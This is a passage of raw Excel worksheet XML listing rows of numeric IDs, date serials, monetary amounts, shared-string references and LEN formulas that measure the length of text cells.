      </c>
      <c r="G100" s="1">
        <v>43903</v>
      </c>
      <c r="H100">
        <v>100000</v>
      </c>
      <c r="I100" t="s">
        <v>10179</v>
      </c>
      <c r="J100" t="s">
        <v>10180</v>
      </c>
      <c r="K100">
        <f>LEN(I100)</f>
        <v>106</v>
      </c>
      <c r="L100">
        <f>LEN(J100)</f>
        <v>106</v>
      </c>
    </row>
    <row r="101" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>19408</v>
      </c>
      <c r="B101">
        <v>2244</v>
      </c>
      <c r="C101" t="s">
        <v>4940</v>
      </c>
      <c r="D101" t="s">
        <v>10008</v>
      </c>
      <c r="E101">
        <v>28</v>
      </c>
      <c r="F101" t="s">
        <v>9610</v>
      </c>
      <c r="G101" s="1">
        <v>43888</v>
      </c>
      <c r="H101">
        <v>1217190</v>
      </c>
      <c r="I101" t="s">
        <v>10010</v>
      </c>
      <c r="J101" t="s">
        <v>10012</v>
      </c>
      <c r="K101">
        <f>LEN(I101)</f>
        <v>33</v>
      </c>
      <c r="L101">
        <f>LEN(J101)</f>
        <v>106</v>
      </c>
    </row>
    <row r="102" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>19853</v>
      </c>
      <c r="B102">
        <v>2571</v>
      </c>
      <c r="C102" t="s">
        <v>5359</v>
      </c>
      <c r="D102" t="s">
        <v>10286</v>
      </c>
      <c r="E102">
        <v>12</v>
      </c>
      <c r="F102" t="s">
        <v>9437</v>
      </c>
      <c r="G102" s="1">
        <v>43871</v>
      </c>
      <c r="H102">
        <v>20000</v>
      </c>
      <c r="I102" t="s">
        <v>10287</v>
      </c>
      <c r="J102" t="s">
        <v>10288</v>
      </c>
      <c r="K102">
        <f>LEN(I102)</f>
        <v>116</v>
      </c>
      <c r="L102">
        <f>LEN(J102)</f>
        <v>104</v>
      </c>
    </row>
    <row r="103" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>19859</v>
      </c>
      <c r="B103">
        <v>2571</v>
      </c>
      <c r="C103" t="s">
        <v>5359</v>
      </c>
      <c r="D103" t="s">
        <v>10286</v>
      </c>
      <c r="E103">
        <v>12</v>
      </c>
      <c r="F103" t="s">
        <v>10291</v>
      </c>
      <c r="G103" s="1">
        <v>43871</v>
      </c>
      <c r="H103">
        <v>200000</v>
      </c>
      <c r="I103" t="s">
        <v>10287</v>
      </c>
      <c r="J103" t="s">
        <v>10288</v>
      </c>
      <c r="K103">
        <f>LEN(I103)</f>
        <v>116</v>
      </c>
      <c r="L103">
        <f>LEN(J103)</f>
        <v>104</v>
      </c>
    </row>
    <row r="104" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>21358</v>
      </c>
      <c r="B104">
        <v>427</v>
      </c>
      <c r="C104" t="s">
        <v>1619</v>
      </c>
      <c r="D104" t="s">
        <v>11325</v>
      </c>
      <c r="E104">
        <v>12</v>
      </c>
      <c r="F104" t="s">
        <v>11327</v>
      </c>
      <c r="G104" s="1">
        <v>44116</v>
      </c>
      <c r="H104">
        <v>40000</v>
      </c>
      <c r="I104" t="s">
        <v>11328</v>
      </c>
      <c r="J104" t="s">
        <v>10170</v>
      </c>
      <c r="K104">
        <f>LEN(I104)</f>
        <v>94</v>
      </c>
      <c r="L104">
        <f>LEN(J104)</f>
        <v>104</v>
      </c>
    </row>
    <row r="105" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>19839</v>
      </c>
      <c r="B105">
        <v>2024</v>
      </c>
      <c r="C105" t="s">
        <v>16277</v>
      </c>
      <c r="D105" t="s">
        <v>16278</v>
      </c>
      <c r="E105">
        <v>16</v>
      </c>
      <c r="F105" t="s">
        <v>10274</v>
      </c>
      <c r="G105" s="1">
        <v>43962</v>
      </c>
      <c r="H105" s="4">
        <v>150000</v>
      </c>
      <c r="I105" t="s">
        <v>10275</v>
      </c>
      <c r="J105" t="s">
        <v>10170</v>
      </c>
      <c r="K105">
        <f>LEN(I105)</f>
        <v>37</v>
      </c>
      <c r="L105">
        <f>LEN(J105)</f>
        <v>104</v>
      </c>
    </row>
    <row r="106" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>19673</v>
      </c>
      <c r="B106">
        <v>2577</v>
      </c>
      <c r="C106" t="s">
        <v>5230</v>
      </c>
      <c r="D106" t="s">
        <v>10169</v>
      </c>
      <c r="E106">
        <v>12</v>
      </c>
      <c r="F106" t="s">
        <v>7057</v>
      </c>
      <c r="G106" s="1">
        <v>43867</v>
      </c>
      <c r="H106">
        <v>50000</v>
      </c>
      <c r="J106" t="s">
        <v>10170</v>
      </c>
      <c r="K106">
        <f>LEN(I106)</f>
        <v>0</v>
      </c>
      <c r="L106">
        <f>LEN(J106)</f>
        <v>104</v>
      </c>
    </row>
    <row r="107" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>20008</v>
      </c>
      <c r="B107">
        <v>500</v>
      </c>
      <c r="C107" t="s">
        <v>625</v>
      </c>
      <c r="D107" t="s">
        <v>9803</v>
      </c>
      <c r="E107">
        <v>11</v>
      </c>
      <c r="F107" t="s">
        <v>512</v>
      </c>
      <c r="G107" s="1">
        <v>43978</v>
      </c>
      <c r="H107">
        <v>10000</v>
      </c>
      <c r="J107" t="s">
        <v>10394</v>
      </c>
      <c r="K107">
        <f>LEN(I107)</f>
        <v>0</v>
      </c>
      <c r="L107">
        <f>LEN(J107)</f>
        <v>104</v>
      </c>
    </row>
    <row r="108" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>20009</v>
      </c>
      <c r="B108">
        <v>500</v>
      </c>
      <c r="C108" t="s">
        <v>625</v>
      </c>
      <c r="D108" t="s">
        <v>9803</v>
      </c>
      <c r="E108">
        <v>11</v>
      </c>
      <c r="F108" t="s">
        <v>9217</v>
      </c>
      <c r="G108" s="1">
        <v>43978</v>
      </c>
      <c r="H108">
        <v>10000</v>
      </c>
      <c r="J108" t="s">
        <v>10394</v>
      </c>
      <c r="K108">
        <f>LEN(I108)</f>
        <v>0</v>
      </c>
      <c r="L108">
        <f>LEN(J108)</f>
        <v>104</v>
      </c>
    </row>
    <row r="109" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>20010</v>
      </c>
      <c r="B109">
        <v>500</v>
      </c>
      <c r="C109" t="s">
        <v>625</v>
      </c>
      <c r="D109" t="s">
        <v>9803</v>
      </c>
      <c r="E109">
        <v>11</v>
      </c>
      <c r="F109" t="s">
        <v>5434</v>
      </c>
      <c r="G109" s="1">
        <v>43978</v>
      </c>
      <c r="H109">
        <v>10000</v>
      </c>
      <c r="J109" t="s">
        <v>10394</v>
      </c>
      <c r="K109">
        <f>LEN(I109)</f>
        <v>0</v>
      </c>
      <c r="L109">
        <f>LEN(J109)</f>
        <v>104</v>
      </c>
    </row>
    <row r="110" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>20011</v>
      </c>
      <c r="B110">
        <v>500</v>
      </c>
      <c r="C110" t="s">
        <v>625</v>
      </c>
      <c r="D110" t="s">
        <v>9803</v>
      </c>
      <c r="E110">
        <v>11</v>
      </c>
      <c r="F110" t="s">
        <v>10395</v>
      </c>
      <c r="G110" s="1">
        <v>43978</v>
      </c>
      <c r="H110">
        <v>10000</v>
      </c>
      <c r="J110" t="s">
        <v>10394</v>
      </c>
      <c r="K110">
        <f>LEN(I110)</f>
        <v>0</v>
      </c>
      <c r="L110">
        <f>LEN(J110)</f>
        <v>104</v>
      </c>
    </row>
    <row r="111" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>20012</v>
      </c>
      <c r="B111">
        <v>500</v>
      </c>
      <c r="C111" t="s">
        <v>625</v>
      </c>
      <c r="D111" t="s">
        <v>9803</v>
      </c>
      <c r="E111">
        <v>11</v>
      </c>
      <c r="F111" t="s">
        <v>9552</v>
      </c>
      <c r="G111" s="1">
        <v>43978</v>
      </c>
      <c r="H111">
        <v>10000</v>
      </c>
      <c r="J111" t="s">
        <v>10394</v>
      </c>
      <c r="K111">
        <f>LEN(I111)</f>
        <v>0</v>
      </c>
      <c r="L111">
        <f>LEN(J111)</f>
        <v>104</v>
      </c>
    </row>
    <row r="112" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>20013</v>
      </c>
      <c r="B112">
        <v>500</v>
      </c>
      <c r="C112" t="s">
        <v>625</v>
      </c>
      <c r="D112" t="s">
        <v>9803</v>
      </c>
      <c r="E112">
        <v>11</v>
      </c>
      <c r="F112" t="s">
        <v>7613</v>
      </c>
      <c r="G112" s="1">
        <v>43978</v>
      </c>
      <c r="H112">
        <v>10000</v>
      </c>
      <c r="J112" t="s">
        <v>10394</v>
      </c>
      <c r="K112">
        <f>LEN(I112)</f>
        <v>0</v>
      </c>
      <c r="L112">
        <f>LEN(J112)</f>
        <v>104</v>
      </c>
    </row>
    <row r="113" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>21359</v>
      </c>
      <c r="B113">
        <v>427</v>
      </c>
      <c r="C113" t="s">
        <v>1619</v>
      </c>
      <c r="D113" t="s">
        <v>11325</v>
      </c>
      <c r="E113">
        <v>12</v>
      </c>
      <c r="F113" t="s">
        <v>11329</v>
      </c>
      <c r="G113" s="1">
        <v>44116</v>
      </c>
      <c r="H113">
        <v>50000</v>
      </c>
      <c r="I113" t="s">
        <v>11330</v>
      </c>
      <c r="J113" t="s">
        <v>11331</v>
      </c>
      <c r="K113">
        <f>LEN(I113)</f>
        <v>114</v>
      </c>
      <c r="L113">
        <f>LEN(J113)</f>
        <v>103</v>
      </c>
    </row>
    <row r="114" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>20487</v>
      </c>
      <c r="B114">
        <v>2689</v>
      </c>
      <c r="C114" t="s">
        <v>5886</v>
      </c>
      <c r="D114" t="s">
        <v>10747</v>
      </c>
      <c r="E114">
        <v>26</v>
      </c>
      <c r="F114" t="s">
        <v>10748</v>
      </c>
      <c r="G114" s="1">
        <v>43951</v>
      </c>
      <c r="H114">
        <v>84000</v>
      </c>
      <c r="I114" t="s">
        <v>10546</v>
      </c>
      <c r="J114" t="s">
        <v>10749</v>
      </c>
      <c r="K114">
        <f>LEN(I114)</f>
        <v>38</v>
      </c>
      <c r="L114">
        <f>LEN(J114)</f>
        <v>103</v>
      </c>
    </row>
    <row r="115" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>20195</v>
      </c>
      <c r="B115">
        <v>237</v>
      </c>
      <c r="C115" t="s">
        <v>798</v>
      </c>
      <c r="D115" t="s">
        <v>10537</v>
      </c>
      <c r="E115">
        <v>16</v>
      </c>
      <c r="F115" t="s">
        <v>10540</v>
      </c>
      <c r="G115" s="1">
        <v>43921</v>
      </c>
      <c r="H115">
        <v>500000</v>
      </c>
      <c r="J115" t="s">
        <v>10541</v>
      </c>
      <c r="K115">
        <f>LEN(I115)</f>
        <v>0</v>
      </c>
      <c r="L115">
        <f>LEN(J115)</f>
        <v>102</v>
      </c>
    </row>
    <row r="116" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>21276</v>
      </c>
      <c r="B116">
        <v>80</v>
      </c>
      <c r="C116" t="s">
        <v>1543</v>
      </c>
      <c r="D116" t="s">
        <v>11197</v>
      </c>
      <c r="E116">
        <v>12</v>
      </c>
      <c r="F116" t="s">
        <v>9217</v>
      </c>
      <c r="G116" s="1">
        <v>44116</v>
      </c>
      <c r="H116">
        <v>27000</v>
      </c>
      <c r="I116" t="s">
        <v>9550</v>
      </c>
      <c r="J116" t="s">
        <v>11260</v>
      </c>
      <c r="K116">
        <f>LEN(I116)</f>
        <v>18</v>
      </c>
      <c r="L116">
        <f>LEN(J116)</f>
        <v>101</v>
      </c>
    </row>
    <row r="117" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>19653</v>
      </c>
      <c r="B117">
        <v>2126</v>
      </c>
      <c r="C117" t="s">
        <v>4772</v>
      </c>
      <c r="D117" t="s">
        <v>10156</v>
      </c>
      <c r="E117">
        <v>1</v>
      </c>
      <c r="F117" t="s">
        <v>10157</v>
      </c>
      <c r="G117" s="1">
        <v>43868</v>
      </c>
      <c r="H117">
        <v>12000</v>
      </c>
      <c r="J117" t="s">
        <v>10158</v>
      </c>
      <c r="K117">
        <f>LEN(I117)</f>
        <v>0</v>
      </c>
      <c r="L117">
        <f>LEN(J117)</f>
        <v>101</v>
      </c>
    </row>
    <row r="118" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>19654</v>
      </c>
      <c r="B118">
        <v>2126</v>
      </c>
      <c r="C118" t="s">
        <v>4772</v>
      </c>
      <c r="D118" t="s">
        <v>10156</v>
      </c>
      <c r="E118">
        <v>1</v>
      </c>
      <c r="F118" t="s">
        <v>10159</v>
      </c>
      <c r="G118" s="1">
        <v>43868</v>
      </c>
      <c r="H118">
        <v>12000</v>
      </c>
      <c r="J118" t="s">
        <v>10158</v>
      </c>
      <c r="K118">
        <f>LEN(I118)</f>
        <v>0</v>
      </c>
      <c r="L118">
        <f>LEN(J118)</f>
        <v>101</v>
      </c>
    </row>
    <row r="119" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>17156</v>
      </c>
      <c r="B119">
        <v>2255</v>
      </c>
      <c r="C119" t="s">
        <v>4868</v>
      </c>
      <c r="D119" t="s">
        <v>9685</v>
      </c>
      <c r="E119">
        <v>16</v>
      </c>
      <c r="F119" t="s">
        <v>2236</v>
      </c>
      <c r="G119" s="1">
        <v>44032</v>
      </c>
      <c r="H119">
        <v>100000</v>
      </c>
      <c r="I119" t="s">
        <v>9689</v>
      </c>
      <c r="J119" t="s">
        <v>9690</v>
      </c>
      <c r="K119">
        <f>LEN(I119)</f>
        <v>81</v>
      </c>
      <c r="L119">
        <f>LEN(J119)</f>
        <v>100</v>
      </c>
    </row>
    <row r="120" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>20715</v>
      </c>
      <c r="B120">
        <v>2332</v>
      </c>
      <c r="C120" t="s">
        <v>5974</v>
      </c>
      <c r="D120" t="s">
        <v>9594</v>
      </c>
      <c r="E120">
        <v>13</v>
      </c>
      <c r="F120" t="s">
        <v>9558</v>
      </c>
      <c r="G120" s="1">
        <v>44000</v>
      </c>
      <c r="H120">
        <v>50000</v>
      </c>
      <c r="I120" t="s">
        <v>10919</v>
      </c>
      <c r="J120" t="s">
        <v>10920</v>
      </c>
      <c r="K120">
        <f>LEN(I120)</f>
        <v>79</v>
      </c>
      <c r="L120">
        <f>LEN(J120)</f>
        <v>98</v>
      </c>
    </row>
    <row r="121" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>19404</v>
      </c>
      <c r="B121">
        <v>2560</v>
      </c>
      <c r="C121" t="s">
        <v>16289</v>
      </c>
      <c r="D121" t="s">
        <v>16290</v>
      </c>
      <c r="E121">
        <v>16</v>
      </c>
      <c r="F121" t="s">
        <v>9441</v>
      </c>
      <c r="G121" s="1">
        <v>43938</v>
      </c>
      <c r="H121">
        <v>649877.69999999995</v>
      </c>
      <c r="J121" t="s">
        <v>10006</v>
      </c>
      <c r="K121">
        <f>LEN(I121)</f>
        <v>0</v>
      </c>
      <c r="L121">
        <f>LEN(J121)</f>
        <v>98</v>
      </c>
    </row>
    <row r="122" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>19405</v>
      </c>
      <c r="B122">
        <v>2560</v>
      </c>
      <c r="C122" t="s">
        <v>16289</v>
      </c>
      <c r="D122" t="s">
        <v>16290</v>
      </c>
      <c r="E122">
        <v>16</v>
      </c>
      <c r="F122" t="s">
        <v>673</v>
      </c>
      <c r="G122" s="1">
        <v>43938</v>
      </c>
      <c r="H122">
        <v>598815.55000000005</v>
      </c>
      <c r="J122" t="s">
        <v>10006</v>
      </c>
      <c r="K122">
        <f>LEN(I122)</f>
        <v>0</v>
      </c>
      <c r="L122">
        <f>LEN(J122)</f>
        <v>98</v>
      </c>
    </row>
    <row r="123" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>19406</v>
      </c>
      <c r="B123">
        <v>2560</v>
      </c>
      <c r="C123" t="s">
        <v>5046</v>
      </c>
      <c r="D123" t="s">
        <v>10005</v>
      </c>
      <c r="E123">
        <v>16</v>
      </c>
      <c r="F123" t="s">
        <v>10007</v>
      </c>
      <c r="G123" s="1">
        <v>43980</v>
      </c>
      <c r="H123">
        <v>500</v>
      </c>
      <c r="J123" t="s">
        <v>10006</v>
      </c>
      <c r="K123">
        <f>LEN(I123)</f>
        <v>0</v>
      </c>
      <c r="L123">
        <f>LEN(J123)</f>
        <v>98</v>
      </c>
    </row>
    <row r="124" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>20344</v>
      </c>
      <c r="B124">
        <v>899</v>
      </c>
      <c r="C124" t="s">
        <v>2943</v>
      </c>
      <c r="D124" t="s">
        <v>10644</v>
      </c>
      <c r="E124">
        <v>26</v>
      </c>
      <c r="F124" t="s">
        <v>9437</v>
      </c>
      <c r="G124" s="1">
        <v>44088</v>
      </c>
      <c r="H124">
        <v>180000</v>
      </c>
      <c r="J124" t="s">
        <v>10645</v>
      </c>
      <c r="K124">
        <f>LEN(I124)</f>
        <v>0</v>
      </c>
      <c r="L124">
        <f>LEN(J124)</f>
        <v>98</v>
      </c>
    </row>
    <row r="125" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>20716</v>
      </c>
      <c r="B125">
        <v>2332</v>
      </c>
      <c r="C125" t="s">
        <v>5974</v>
      </c>
      <c r="D125" t="s">
        <v>9594</v>
      </c>
      <c r="E125">
        <v>13</v>
      </c>
      <c r="F125" t="s">
        <v>9523</v>
      </c>
      <c r="G125" s="1">
        <v>44000</v>
      </c>
      <c r="H125">
        <v>50000</v>
      </c>
      <c r="I125" t="s">
        <v>10853</v>
      </c>
      <c r="J125" t="s">
        <v>10921</v>
      </c>
      <c r="K125">
        <f>LEN(I125)</f>
        <v>129</v>
      </c>
      <c r="L125">
        <f>LEN(J125)</f>
        <v>97</v>
      </c>
    </row>
    <row r="126" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>16855</v>
      </c>
      <c r="B126">
        <v>159</v>
      </c>
      <c r="C126" t="s">
        <v>109</v>
      </c>
      <c r="D126" t="s">
        <v>9524</v>
      </c>
      <c r="E126">
        <v>12</v>
      </c>
      <c r="F126" t="s">
        <v>9437</v>
      </c>
      <c r="G126" s="1">
        <v>43896</v>
      </c>
      <c r="H126">
        <v>0</v>
      </c>
      <c r="I126" t="s">
        <v>9525</v>
      </c>
      <c r="J126" t="s">
        <v>9526</v>
      </c>
      <c r="K126">
        <f>LEN(I126)</f>
        <v>48</v>
      </c>
      <c r="L126">
        <f>LEN(J126)</f>
        <v>97</v>
      </c>
    </row>
    <row r="127" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>16856</v>
      </c>
      <c r="B127">
        <v>159</v>
      </c>
      <c r="C127" t="s">
        <v>109</v>
      </c>
      <c r="D127" t="s">
        <v>9524</v>
      </c>
      <c r="E127">
        <v>12</v>
      </c>
      <c r="F127" t="s">
        <v>9527</v>
      </c>
      <c r="G127" s="1">
        <v>43896</v>
      </c>
      <c r="H127">
        <v>0</v>
      </c>
      <c r="I127" t="s">
        <v>9525</v>
      </c>
      <c r="J127" t="s">
        <v>9526</v>
      </c>
      <c r="K127">
        <f>LEN(I127)</f>
        <v>48</v>
      </c>
      <c r="L127">
        <f>LEN(J127)</f>
        <v>97</v>
      </c>
    </row>
    <row r="128" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>16857</v>
      </c>
      <c r="B128">
        <v>159</v>
      </c>
      <c r="C128" t="s">
        <v>109</v>
      </c>
      <c r="D128" t="s">
        <v>9524</v>
      </c>
      <c r="E128">
        <v>12</v>
      </c>
      <c r="F128" t="s">
        <v>9528</v>
      </c>
      <c r="G128" s="1">
        <v>43896</v>
      </c>
      <c r="H128">
        <v>0</v>
      </c>
      <c r="I128" t="s">
        <v>9525</v>
      </c>
      <c r="J128" t="s">
        <v>9526</v>
      </c>
      <c r="K128">
        <f>LEN(I128)</f>
        <v>48</v>
      </c>
      <c r="L128">
        <f>LEN(J128)</f>
        <v>97</v>
      </c>
    </row>
    <row r="129" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>16858</v>
      </c>
      <c r="B129">
        <v>159</v>
      </c>
      <c r="C129" t="s">
        <v>109</v>
      </c>
      <c r="D129" t="s">
        <v>9524</v>
      </c>
      <c r="E129">
        <v>12</v>
      </c>
      <c r="F129" t="s">
        <v>9529</v>
      </c>
      <c r="G129" s="1">
        <v>43896</v>
      </c>
      <c r="H129">
        <v>0</v>
      </c>
      <c r="I129" t="s">
        <v>9525</v>
      </c>
      <c r="J129" t="s">
        <v>9526</v>
      </c>
      <c r="K129">
        <f>LEN(I129)</f>
        <v>48</v>
      </c>
      <c r="L129">
        <f>LEN(J129)</f>
        <v>97</v>
      </c>
    </row>
    <row r="130" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>16859</v>
      </c>
      <c r="B130">
        <v>159</v>
      </c>
      <c r="C130" t="s">
        <v>109</v>
      </c>
      <c r="D130" t="s">
        <v>9524</v>
      </c>
      <c r="E130">
        <v>12</v>
      </c>
      <c r="F130" t="s">
        <v>9530</v>
      </c>
      <c r="G130" s="1">
        <v>43896</v>
      </c>
      <c r="H130">
        <v>0</v>
      </c>
      <c r="I130" t="s">
        <v>9525</v>
      </c>
      <c r="J130" t="s">
        <v>9526</v>
      </c>
      <c r="K130">
        <f>LEN(I130)</f>
        <v>48</v>
      </c>
      <c r="L130">
        <f>LEN(J130)</f>
        <v>97</v>
      </c>
    </row>
    <row r="131" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>16860</v>
      </c>
      <c r="B131">
        <v>159</v>
      </c>
      <c r="C131" t="s">
        <v>109</v>
      </c>
      <c r="D131" t="s">
        <v>9524</v>
      </c>
      <c r="E131">
        <v>12</v>
      </c>
      <c r="F131" t="s">
        <v>9531</v>
      </c>
      <c r="G131" s="1">
        <v>43896</v>
      </c>
      <c r="H131">
        <v>0</v>
      </c>
      <c r="I131" t="s">
        <v>9525</v>
      </c>
      <c r="J131" t="s">
        <v>9526</v>
      </c>
      <c r="K131">
        <f>LEN(I131)</f>
        <v>48</v>
      </c>
      <c r="L131">
        <f>LEN(J131)</f>
        <v>97</v>
      </c>
    </row>
    <row r="132" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>16862</v>
      </c>
      <c r="B132">
        <v>159</v>
      </c>
      <c r="C132" t="s">
        <v>109</v>
      </c>
      <c r="D132" t="s">
        <v>9524</v>
      </c>
      <c r="E132">
        <v>12</v>
      </c>
      <c r="F132" t="s">
        <v>9532</v>
      </c>
      <c r="G132" s="1">
        <v>43896</v>
      </c>
      <c r="H132">
        <v>0</v>
      </c>
      <c r="I132" t="s">
        <v>9525</v>
      </c>
      <c r="J132" t="s">
        <v>9526</v>
      </c>
      <c r="K132">
        <f>LEN(I132)</f>
        <v>48</v>
      </c>
      <c r="L132">
        <f>LEN(J132)</f>
        <v>97</v>
      </c>
    </row>
    <row r="133" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>16864</v>
      </c>
      <c r="B133">
        <v>159</v>
      </c>
      <c r="C133" t="s">
        <v>109</v>
      </c>
      <c r="D133" t="s">
        <v>9524</v>
      </c>
      <c r="E133">
        <v>12</v>
      </c>
      <c r="F133" t="s">
        <v>9533</v>
      </c>
      <c r="G133" s="1">
        <v>43896</v>
      </c>
      <c r="H133">
        <v>0</v>
      </c>
      <c r="I133" t="s">
        <v>9525</v>
      </c>
      <c r="J133" t="s">
        <v>9526</v>
      </c>
      <c r="K133">
        <f>LEN(I133)</f>
        <v>48</v>
      </c>
      <c r="L133">
        <f>LEN(J133)</f>
        <v>97</v>
      </c>
    </row>
    <row r="134" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>16865</v>
      </c>
      <c r="B134">
        <v>159</v>
      </c>
      <c r="C134" t="s">
        <v>109</v>
      </c>
      <c r="D134" t="s">
        <v>9524</v>
      </c>
      <c r="E134">
        <v>12</v>
      </c>
      <c r="F134" t="s">
        <v>1746</v>
      </c>
      <c r="G134" s="1">
        <v>43896</v>
      </c>
      <c r="H134">
        <v>0</v>
      </c>
      <c r="I134" t="s">
        <v>9525</v>
      </c>
      <c r="J134" t="s">
        <v>9526</v>
      </c>
      <c r="K134">
        <f>LEN(I134)</f>
        <v>48</v>
      </c>
      <c r="L134">
        <f>LEN(J134)</f>
        <v>97</v>
      </c>
    </row>
    <row r="135" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>16866</v>
      </c>
      <c r="B135">
        <v>159</v>
      </c>
      <c r="C135" t="s">
        <v>109</v>
      </c>
      <c r="D135" t="s">
        <v>9524</v>
      </c>
      <c r="E135">
        <v>12</v>
      </c>
      <c r="F135" t="s">
        <v>3814</v>
      </c>
      <c r="G135" s="1">
        <v>43896</v>
      </c>
      <c r="H135">
        <v>0</v>
      </c>
      <c r="I135" t="s">
        <v>9525</v>
      </c>
      <c r="J135" t="s">
        <v>9526</v>
      </c>
      <c r="K135">
        <f>LEN(I135)</f>
        <v>48</v>
      </c>
      <c r="L135">
        <f>LEN(J135)</f>
        <v>97</v>
      </c>
    </row>
    <row r="136" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>16867</v>
      </c>
      <c r="B136">
        <v>159</v>
      </c>
      <c r="C136" t="s">
        <v>109</v>
      </c>
      <c r="D136" t="s">
        <v>9524</v>
      </c>
      <c r="E136">
        <v>12</v>
      </c>
      <c r="F136" t="s">
        <v>9435</v>
      </c>
      <c r="G136" s="1">
        <v>43896</v>
      </c>
      <c r="H136">
        <v>0</v>
      </c>
      <c r="I136" t="s">
        <v>9525</v>
      </c>
      <c r="J136" t="s">
        <v>9526</v>
      </c>
      <c r="K136">
        <f>LEN(I136)</f>
        <v>48</v>
      </c>
      <c r="L136">
        <f>LEN(J136)</f>
        <v>97</v>
      </c>
    </row>
    <row r="137" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>16868</v>
      </c>
      <c r="B137">
        <v>159</v>
      </c>
      <c r="C137" t="s">
        <v>109</v>
      </c>
      <c r="D137" t="s">
        <v>9524</v>
      </c>
      <c r="E137">
        <v>12</v>
      </c>
      <c r="F137" t="s">
        <v>9459</v>
      </c>
      <c r="G137" s="1">
        <v>43896</v>
      </c>
      <c r="H137">
        <v>0</v>
      </c>
      <c r="I137" t="s">
        <v>9525</v>
      </c>
      <c r="J137" t="s">
        <v>9526</v>
      </c>
      <c r="K137">
        <f>LEN(I137)</f>
        <v>48</v>
      </c>
      <c r="L137">
        <f>LEN(J137)</f>
        <v>97</v>
      </c>
    </row>
    <row r="138" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>19934</v>
      </c>
      <c r="B138">
        <v>159</v>
      </c>
      <c r="C138" t="s">
        <v>109</v>
      </c>
      <c r="D138" t="s">
        <v>9524</v>
      </c>
      <c r="E138">
        <v>12</v>
      </c>
      <c r="F138" t="s">
        <v>10130</v>
      </c>
      <c r="G138" s="1">
        <v>43896</v>
      </c>
      <c r="H138">
        <v>0</v>
      </c>
      <c r="I138" t="s">
        <v>9525</v>
      </c>
      <c r="J138" t="s">
        <v>9526</v>
      </c>
      <c r="K138">
        <f>LEN(I138)</f>
        <v>48</v>
      </c>
      <c r="L138">
        <f>LEN(J138)</f>
        <v>97</v>
      </c>
    </row>
    <row r="139" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>19935</v>
      </c>
      <c r="B139">
        <v>159</v>
      </c>
      <c r="C139" t="s">
        <v>109</v>
      </c>
      <c r="D139" t="s">
        <v>9524</v>
      </c>
      <c r="E139">
        <v>12</v>
      </c>
      <c r="F139" t="s">
        <v>9681</v>
      </c>
      <c r="G139" s="1">
        <v>43896</v>
      </c>
      <c r="H139">
        <v>0</v>
      </c>
      <c r="I139" t="s">
        <v>9525</v>
      </c>
      <c r="J139" t="s">
        <v>9526</v>
      </c>
      <c r="K139">
        <f>LEN(I139)</f>
        <v>48</v>
      </c>
      <c r="L139">
        <f>LEN(J139)</f>
        <v>97</v>
      </c>
    </row>
    <row r="140" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>19936</v>
      </c>
      <c r="B140">
        <v>159</v>
      </c>
      <c r="C140" t="s">
        <v>109</v>
      </c>
      <c r="D140" t="s">
        <v>9524</v>
      </c>
      <c r="E140">
        <v>12</v>
      </c>
      <c r="F140" t="s">
        <v>9577</v>
      </c>
      <c r="G140" s="1">
        <v>43896</v>
      </c>
      <c r="H140">
        <v>0</v>
      </c>
      <c r="I140" t="s">
        <v>9525</v>
      </c>
      <c r="J140" t="s">
        <v>9526</v>
      </c>
      <c r="K140">
        <f>LEN(I140)</f>
        <v>48</v>
      </c>
      <c r="L140">
        <f>LEN(J140)</f>
        <v>97</v>
      </c>
    </row>
    <row r="141" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>20048</v>
      </c>
      <c r="B141">
        <v>2669</v>
      </c>
      <c r="C141" t="s">
        <v>5588</v>
      </c>
      <c r="D141" t="s">
        <v>10434</v>
      </c>
      <c r="E141">
        <v>12</v>
      </c>
      <c r="F141" t="s">
        <v>2236</v>
      </c>
      <c r="G141" s="1">
        <v>43928</v>
      </c>
      <c r="H141">
        <v>671174</v>
      </c>
      <c r="I141" t="s">
        <v>10435</v>
      </c>
      <c r="J141" t="s">
        <v>10436</v>
